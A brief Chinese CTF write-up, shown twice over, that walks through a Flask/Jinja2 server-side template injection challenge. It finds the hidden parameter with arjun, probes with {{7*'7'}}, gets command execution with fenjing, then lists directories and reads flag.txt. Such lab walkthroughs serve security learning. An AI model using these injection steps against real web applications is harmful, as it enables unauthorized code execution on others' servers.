考点,注入点探测,ssti,jinja模板
打开题目后可以看到是flask,不难联想到是模板注入,但是我们还是不知道注入点的参数,所以我们可以用arjun去进行探测
配置方法
pip3 install arjun
arjun -u 网址
之后我们先尝试注入{{7*'7'}}
可以通过回显判断出是jinjia模板直接上fenjing
直接命令执行即可
ls /
ls
cat flag.txt
打开题目后可以看到是flask,不难联想到是模板注入,但是我们还是不知道注入点的参数,所以我们可以用arjun去进行探测
配置方法
pip3 install arjun
arjun -u 网址
之后我们先尝试注入{{7*'7'}}
可以通过回显判断出是jinjia模板直接上fenjing
直接命令执行即可
ls /
ls
cat flag.txt